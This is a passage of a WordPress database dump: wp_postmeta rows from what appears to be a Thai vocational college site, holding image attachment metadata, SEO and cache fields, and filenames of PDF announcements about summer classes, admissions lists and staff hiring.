(11918, 5304, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:682;s:6:\"height\";i:793;s:4:\"file\";s:29:\"2019/03/5-3-2562-15-07-44.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2562-15-07-44-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-3-2562-15-07-44-258x300.png\";s:5:\"width\";i:258;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2562-15-07-44-258x300.png\";s:5:\"width\";i:258;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11919, 5320, '_edit_lock', '1552281116:3'),
(11920, 5320, '_edit_last', '3'),
(11921, 5321, '_wp_attached_file', '2019/03/ประกาศ-การเปิดการเรียนการสอนภาคฤดูร้อน-ปีการศึกษา-2561.pdf'),
(11925, 5320, '_hide_featured', NULL),
(11926, 5320, '_yoast_wpseo_content_score', '60'),
(11927, 5320, '_yoast_wpseo_primary_category', '3'),
(11928, 5320, '_wpas_done_all', '1'),
(11929, 5320, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575266712;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5026;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(11934, 5324, '_edit_lock', '1552446519:3'),
(11935, 5324, '_edit_last', '3'),
(11936, 5325, '_wp_attached_file', '2019/03/54268148_775980239444833_4695669555530301440_o.jpg'),
(11937, 5325, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2019/03/54268148_775980239444833_4695669555530301440_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"54268148_775980239444833_4695669555530301440_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"54268148_775980239444833_4695669555530301440_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"54268148_775980239444833_4695669555530301440_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"54268148_775980239444833_4695669555530301440_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"54268148_775980239444833_4695669555530301440_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11938, 5324, '_thumbnail_id', '5325'),
(11942, 5324, '_hide_featured', NULL),
(11943, 5324, '_yoast_wpseo_content_score', '30'),
(11944, 5324, '_yoast_wpseo_primary_category', '31'),
(11945, 5324, '_wpas_done_all', '1'),
(11946, 5327, '_edit_lock', '1552449214:3'),
(11947, 5327, '_edit_last', '3'),
(11948, 5328, '_wp_attached_file', '2019/03/53521603_776591289383728_6718147871142576128_o.jpg'),
(11949, 5328, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:58:\"2019/03/53521603_776591289383728_6718147871142576128_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"53521603_776591289383728_6718147871142576128_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"53521603_776591289383728_6718147871142576128_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"53521603_776591289383728_6718147871142576128_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"53521603_776591289383728_6718147871142576128_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"53521603_776591289383728_6718147871142576128_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11950, 5327, '_thumbnail_id', '5328'),
(11954, 5327, '_hide_featured', NULL),
(11955, 5327, '_yoast_wpseo_content_score', '30'),
(11956, 5327, '_yoast_wpseo_primary_category', '31'),
(11957, 5327, '_wpas_done_all', '1'),
(11958, 5327, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575022007;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5936;}i:1;a:1:{s:2:\"id\";i:5324;}i:2;a:1:{s:2:\"id\";i:4951;}}}}'),
(11959, 5324, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575509196;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4160;}i:1;a:1:{s:2:\"id\";i:5327;}i:2;a:1:{s:2:\"id\";i:5026;}}}}'),
(11960, 5331, '_edit_lock', '1552881674:3'),
(11961, 5331, '_edit_last', '3'),
(11962, 5332, '_wp_attached_file', '2019/03/42196_การเปิดการเรียนการสอนภาคฤดูร้อน-ปีการศึกษา-2561-รอบสอง.pdf'),
(11966, 5331, '_hide_featured', NULL),
(11967, 5331, '_yoast_wpseo_content_score', '60'),
(11968, 5331, '_yoast_wpseo_primary_category', '3'),
(11969, 5331, '_wpas_done_all', '1'),
(11970, 5331, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575710592;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5026;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(11971, 5335, '_edit_lock', '1552932263:1'),
(11972, 5335, '_edit_last', '1'),
(11973, 5335, '_hide_featured', NULL),
(11974, 5335, '_yoast_wpseo_content_score', '90'),
(11975, 5335, '_yoast_wpseo_primary_category', '39'),
(11979, 5335, '_wpas_done_all', '1'),
(11982, 5335, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575737446;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5049;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:5608;}}}}'),
(11985, 5341, '_wp_attached_file', '2019/03/banner-2562.png'),
(11986, 5341, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:899;s:6:\"height\";i:371;s:4:\"file\";s:23:\"2019/03/banner-2562.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"banner-2562-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"banner-2562-300x124.png\";s:5:\"width\";i:300;s:6:\"height\";i:124;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"banner-2562-768x317.png\";s:5:\"width\";i:768;s:6:\"height\";i:317;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"banner-2562-400x165.png\";s:5:\"width\";i:400;s:6:\"height\";i:165;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11987, 5342, '_wp_attached_file', '2019/03/pvc-1.jpg'),
(11988, 5342, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:260;s:6:\"height\";i:99;s:4:\"file\";s:17:\"2019/03/pvc-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"pvc-1-150x99.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:99;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11989, 5343, '_wp_attached_file', '2019/03/pvs-1.jpg'),
(11990, 5343, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:260;s:6:\"height\";i:99;s:4:\"file\";s:17:\"2019/03/pvs-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"pvs-1-150x99.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:99;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11991, 5335, '_members_access_error', '[contact-form][contact-field label=\"Name\" type=\"name\" required=\"true\" /][contact-field label=\"Email\" type=\"email\" required=\"true\" /][contact-field label=\"Website\" type=\"url\" /][contact-field label=\"Message\" type=\"textarea\" /][/contact-form]\r\n\r\n[contact-form][contact-field label=\"Name\" type=\"name\" required=\"true\" /][contact-field label=\"Email\" type=\"email\" required=\"true\" /][contact-field label=\"Website\" type=\"url\" /][contact-field label=\"Message\" type=\"textarea\" /][/contact-form]\r\n\r\n[contact-form][contact-field label=\"Name\" type=\"name\" required=\"true\" /][contact-field label=\"Email\" type=\"email\" required=\"true\" /][contact-field label=\"Website\" type=\"url\" /][contact-field label=\"Message\" type=\"textarea\" /][/contact-form]'),
(11995, 5350, '_edit_lock', '1553138042:3'),
(11996, 5350, '_edit_last', '3'),
(11997, 5351, '_wp_attached_file', '2019/03/21-3-2562-8-40-14.png'),
(11998, 5351, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:517;s:6:\"height\";i:756;s:4:\"file\";s:29:\"2019/03/21-3-2562-8-40-14.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"21-3-2562-8-40-14-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"21-3-2562-8-40-14-205x300.png\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"21-3-2562-8-40-14-205x300.png\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11999, 5352, '_wp_attached_file', '2019/03/54435652_780686975640826_8687803015341539328_o.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(12000, 5352, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/03/54435652_780686975640826_8687803015341539328_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"54435652_780686975640826_8687803015341539328_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"54435652_780686975640826_8687803015341539328_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"54435652_780686975640826_8687803015341539328_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"54435652_780686975640826_8687803015341539328_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"54435652_780686975640826_8687803015341539328_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12001, 5350, '_thumbnail_id', '5352'),
(12005, 5350, '_hide_featured', NULL),
(12006, 5350, '_yoast_wpseo_content_score', '30'),
(12007, 5350, '_yoast_wpseo_primary_category', '31'),
(12008, 5350, '_wpas_done_all', '1'),
(12009, 5350, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575550977;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5381;}i:1;a:1:{s:2:\"id\";i:5385;}i:2;a:1:{s:2:\"id\";i:5200;}}}}'),
(12010, 5354, '_edit_lock', '1553225704:3'),
(12011, 5354, '_edit_last', '3'),
(12012, 5355, '_wp_attached_file', '2019/03/ประกาศรายชื่อเพิ่ม-ปวช.pdf'),
(12016, 5354, '_hide_featured', NULL),
(12017, 5354, '_yoast_wpseo_content_score', '60'),
(12018, 5354, '_yoast_wpseo_primary_category', '3'),
(12019, 5354, '_wpas_done_all', '1'),
(12020, 5357, '_edit_lock', '1553239858:3'),
(12021, 5357, '_edit_last', '3'),
(12022, 5358, '_wp_attached_file', '2019/03/ประกาศรายชื่อเพิ่ม-ปวส.pdf'),
(12026, 5357, '_hide_featured', NULL),
(12027, 5357, '_yoast_wpseo_content_score', '60'),
(12028, 5357, '_yoast_wpseo_primary_category', '3'),
(12029, 5357, '_wpas_done_all', '1'),
(12030, 5354, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575654919;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4701;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(12031, 5357, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575662477;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4701;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(12032, 5361, '_edit_lock', '1553245439:3'),
(12033, 5361, '_edit_last', '3'),
(12034, 5362, '_wp_attached_file', '2019/03/ตารางเวร-เดือนเม.ย.62.pdf'),
(12038, 5361, '_hide_featured', NULL),
(12039, 5361, '_yoast_wpseo_content_score', '60'),
(12040, 5361, '_yoast_wpseo_primary_category', '3'),
(12041, 5361, '_wpas_done_all', '1'),
(12042, 5361, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575620386;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4786;}i:1;a:1:{s:2:\"id\";i:5124;}i:2;a:1:{s:2:\"id\";i:5277;}}}}'),
(12043, 5364, '_wp_attached_file', '2019/01/22-3-2562-16-16-23.png'),
(12044, 5364, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:206;s:6:\"height\";i:78;s:4:\"file\";s:30:\"2019/01/22-3-2562-16-16-23.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"22-3-2562-16-16-23-150x78.png\";s:5:\"width\";i:150;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12045, 5365, '_wp_attached_file', '2019/01/22-3-2562-16-17-29.png'),
(12046, 5365, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:211;s:6:\"height\";i:79;s:4:\"file\";s:30:\"2019/01/22-3-2562-16-17-29.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"22-3-2562-16-17-29-150x79.png\";s:5:\"width\";i:150;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12047, 5370, '_wp_attached_file', '2019/01/online-register.png'),
(12048, 5370, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2400;s:6:\"height\";i:736;s:4:\"file\";s:27:\"2019/01/online-register.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"online-register-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"online-register-300x92.png\";s:5:\"width\";i:300;s:6:\"height\";i:92;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"online-register-768x236.png\";s:5:\"width\";i:768;s:6:\"height\";i:236;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"online-register-1024x314.png\";s:5:\"width\";i:1024;s:6:\"height\";i:314;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"online-register-400x123.png\";s:5:\"width\";i:400;s:6:\"height\";i:123;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12049, 5373, '_edit_lock', '1553503116:3'),
(12050, 5373, '_edit_last', '3'),
(12051, 5374, '_wp_attached_file', '2019/03/ประกาศ-รับสมัครสอบคัดเลือก-ครูอัตราจ้าง-จำนวน-2-อัตรา.pdf'),
(12055, 5373, '_hide_featured', NULL),
(12056, 5373, '_yoast_wpseo_content_score', '60'),
(12057, 5373, '_yoast_wpseo_primary_category', '3'),
(12058, 5373, '_wpas_done_all', '1'),
(12059, 5373, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575600059;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(12060, 5378, '_edit_lock', '1553759412:3'),
(12061, 5378, '_edit_last', '3'),
(12062, 5379, '_wp_attached_file', '2019/03/55505712_784064678636389_4811560323070820352_o.jpg'),
(12063, 5379, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2019/03/55505712_784064678636389_4811560323070820352_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"55505712_784064678636389_4811560323070820352_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"55505712_784064678636389_4811560323070820352_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"55505712_784064678636389_4811560323070820352_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"55505712_784064678636389_4811560323070820352_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"55505712_784064678636389_4811560323070820352_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12064, 5378, '_thumbnail_id', '5379'),
(12068, 5378, '_hide_featured', NULL),
(12069, 5378, '_yoast_wpseo_content_score', '30'),
(12070, 5378, '_yoast_wpseo_primary_category', '31'),
(12071, 5378, '_wpas_done_all', '1'),
(12072, 5381, '_edit_lock', '1553764108:3'),
(12073, 5381, '_edit_last', '3'),
(12074, 5382, '_wp_attached_file', '2019/03/28-3-2562-14-52-46.png'),
(12075, 5382, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:508;s:6:\"height\";i:747;s:4:\"file\";s:30:\"2019/03/28-3-2562-14-52-46.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"28-3-2562-14-52-46-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"28-3-2562-14-52-46-204x300.png\";s:5:\"width\";i:204;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"28-3-2562-14-52-46-204x300.png\";s:5:\"width\";i:204;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12076, 5381, '_thumbnail_id', '5384'),
(12080, 5381, '_hide_featured', NULL),
(12081, 5381, '_yoast_wpseo_content_score', '30'),
(12082, 5381, '_yoast_wpseo_primary_category', '31'),
(12083, 5381, '_wpas_done_all', '1'),
(12084, 5381, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575700080;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5733;}i:1;a:1:{s:2:\"id\";i:6057;}i:2;a:1:{s:2:\"id\";i:5865;}}}}'),
(12085, 5384, '_wp_attached_file', '2019/03/55764334_784656435243880_3876439397477908480_o.jpg'),
(12086, 5384, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/03/55764334_784656435243880_3876439397477908480_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"55764334_784656435243880_3876439397477908480_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"55764334_784656435243880_3876439397477908480_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"55764334_784656435243880_3876439397477908480_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"55764334_784656435243880_3876439397477908480_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"55764334_784656435243880_3876439397477908480_o-400x267.jpg\";s:5:\"width\";i:400;s